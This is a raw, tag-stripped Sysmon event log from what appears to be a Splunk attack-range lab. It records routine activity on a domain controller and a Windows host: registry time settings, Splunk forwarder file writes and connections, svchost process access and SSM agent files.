10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828a9-0x4fea8f09) 13241300x8000000000000000284758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000284757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x006fc0b4) 13241300x8000000000000000284756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d82898-0x8c61bf09) 13241300x8000000000000000284755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a0-0xee262709) 13241300x8000000000000000284754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828a9-0x4fea8f09) 23542300x8000000000000000284753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:26.313{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=803F6357D67BEFCAAABD27F7BDD10E4A,SHA256=A11F5C229118789C5CA32A62494B263367504DEE845664130DEDF257172BBAB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:26.445{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDC002A07810ACCB7A3ACB4BEFE527F1,SHA256=2849666E2C064E1AA2E8C33F90015EEA6A90C568CDE141B0FC8977E854C2C48C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:23.601{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51146-false10.0.1.12-8000- 23542300x8000000000000000284764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:27.344{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADEB9F54CC4DF539F180A2C91BEB0ACE,SHA256=B895616F0AD425BCD87E8B694A625C5100516F350A65B7B93EE2CAA598E6595E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:27.539{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7F0A902D6AE0E4F04CB471109A48229,SHA256=999405761F2D94281FA9F084F3ADF0CFAFF005A6672F2FF08587DC6E294B6EFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:28.617{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4EE354C68EF61C3941EC4F656A8E887,SHA256=5723DAE72D85E27C0AEAAE4E1D102A860EE6B076818E6719C40250F2DA214AC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:28.375{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4224A3D62FD9682EF181FB9750C518BF,SHA256=27BD203C25EACEB74042297C96B3E449302D73678FA15AC4E4C42B9859639B5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:29.851{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=366D96282691FB55CC71FBBE93CCC055,SHA256=1D1D8A80255A334DAF86F3D1297F14F3AF1647A831DD85A8E99D1C9A7980DFC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:29.391{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C9F293D2EEBFD6D240C06D2AF90BD45,SHA256=265FEF3B6CCE30C31109DFF2BDE8E43E574AC66A724B233E57B9752C76127DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:30.407{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3580A54B43562C9F00076D667ACF0D86,SHA256=6C9A7FD1A83A540105C494D6110E237CC765A3A8F0B14424B32CBD378A0F9E61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:30.226{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=1B97DEBAC50C64816EC8CCE33F01F0E9,SHA256=64F11EC89E0B4014545488D52421E47D566DC5B70BECEBCC711CFA4A66BD9C26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:31.422{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89439459EC8B99AB0864AC8223E45D1E,SHA256=596CD267742E1ECBB88E7951C756D1BAEB8186D670E645E25EA744669046FD36,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:28.649{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51147-false10.0.1.12-8000- 23542300x8000000000000000213795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:31.070{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56912E1419C92DBD8E46946A504A0BA2,SHA256=DC0F962F7A8370C1EE628BDA5A5F24B34DFAC563CFCB68F73545E573E918DED1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:28.650{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53198-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:32.438{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D2F91D3B632D088F6507562CDF23FB,SHA256=086F1C374B841F900993891E437E45E5879B45AD52687D8981D7ABC6823EC0FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:32.680{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:32.680{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:32.680{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:32.164{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B61D60D78E2DBB13D10393D337129F8,SHA256=4E98B798B60B723F306B5C9083B8812CB52110240621A82D42A142C2C85AB6B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:33.453{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9E217CF9D1F2778CC7B5CC62BB8D242,SHA256=D2DE7EE8B80193AFF8B2A65978DBB5E0D5D5C93CD885AE56C1564F48E93C8B7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:33.886{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-118MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:33.195{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EA4F6A2E812A64DF41D09410F4092EA,SHA256=04364FA32F8F3AB5F8D4806C43E90220750D736A22062E893219B6E5E6F67B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:33.235{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E0803E8C6D3735EBDDE96162444763DE,SHA256=134A867B65C75440F836FDBB6E102B36B7E421DC0A3155FB4DAB9C8567D97D79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:34.532{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48AAF63CFF87500D0784B4DBC3C6F76B,SHA256=D5AD83EDD765E698C230089B7F5B959F1B53A810D42AF080DE603989126AC891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:34.885{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-119MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:34.197{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CF53E71AC2A9696AD68E5DA1AD63C99,SHA256=E9A0C017F6ACABB8C90B702EF11455AD1F029F2EA5B467974CA929ACEB87F1F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:35.547{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC43127BEB6FD1C10D0B479BA6F3315A,SHA256=09D5FCD4FF28B1A6CC15EFDC03D9DEA90E9E1C515B080B4E6CC7E0549678893D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:33.666{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51148-false10.0.1.12-8000- 23542300x8000000000000000213805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:35.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B33CEC8D6CB6C1B739A01894BBEDF64,SHA256=246D7FE53E11F1C592B0808CE6F3C88A33B6011E214BF738ACB5BCDD9FE5F5BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:36.563{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE111C508A6BC5EFEF44F1E51BDC1657,SHA256=1FA912166F5B6514D942E5498A33E348C04D6A70292579FE1E5EFF3415A235A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:36.229{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=587A3A3B68DBB046B5FBEC6A756DDA87,SHA256=480ECF9985C53BB57E794164B9CB8AF8D89EF525699CB89D51066A21BA2C4B0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:33.697{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53199-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:37.750{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=797268CE048E3D1D0F8EB2AFB4ABC6C0,SHA256=641EC8BF47FBAD40D1FCDCAB526D421F8BC1AAFE5A9BF8D92829BCFD4D3B62A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:37.464{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21BC15096342D9594B8EAC747469E562,SHA256=F338EC3A9C405D70273BA60AD3F1EA7D4293C2C65D4AC573B9DC323A4F6098FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:38.797{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29FD5B202C97A80F1C34F0FF3DA9696F,SHA256=A9CF5CEC689F46076ABAD7E1790FBED2908C8DDB50F9BF9A4497DC36F7D6EBA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:38.573{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4113CBBC9781F7FDC8EF1722F2BD368,SHA256=CF1557328EF5BC5FDF48B601693478724D96ABCA7B4FB3B82B7596400A2DD9A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:39.891{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79D4F3C03F780218CC186535E07736BC,SHA256=1CC8899FC314425446D91277FF4D33157C007CF0EBD2D1B2BD50CC7459000421,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:39.745{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADBCEE19E2C87DB7AC4D69E932CD39AD,SHA256=14030F1D6D6553A51B2CA4A36567932880883920CB94B30E73B45758149AA96C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:39.391{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:36.308{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:ad4f:96:d14b:8b64win-host-tcontreras-attack-range-985.eu-central-1.compute.internal546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 23542300x8000000000000000213812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:40.792{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF27597E39E25933402E448F248C374F,SHA256=990A820CA9EF287255A653ECBFB3EF0E4A0794D4EA167EE5BD51E800731323F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:40.891{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC9D04F6D5E835A7BDAE63D4DAF1BEAB,SHA256=3B4CD80186777134F85C1880B0738BE4568D1F3C9BBFA6AADC6E4FABA1BCC63E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:38.697{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53200-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:41.985{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 